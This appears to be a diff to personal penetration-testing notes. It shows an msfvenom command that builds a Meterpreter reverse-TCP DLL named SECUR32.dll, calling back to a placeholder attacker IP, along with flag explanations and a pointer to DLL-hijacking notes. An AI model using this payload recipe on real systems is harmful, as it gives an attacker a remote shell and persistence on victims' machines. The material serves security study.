amandaguglieri/hackinglife/docs/msfvenom.md

 ## crafting a DLL file with a webshell

+The `Meterpreter` payload is a specific type of multi-faceted payload that uses `DLL injection` to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes.

 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll
 # -p: for the chosen payload
 # -a: architecture in the victim machine/application
 # -f: format for the output file

 ```
 [More about DLL highjacking in thick client applications](thick-applications/tca-attacking-thick-clients-applications.md#how-is-dll-hijacking-perform).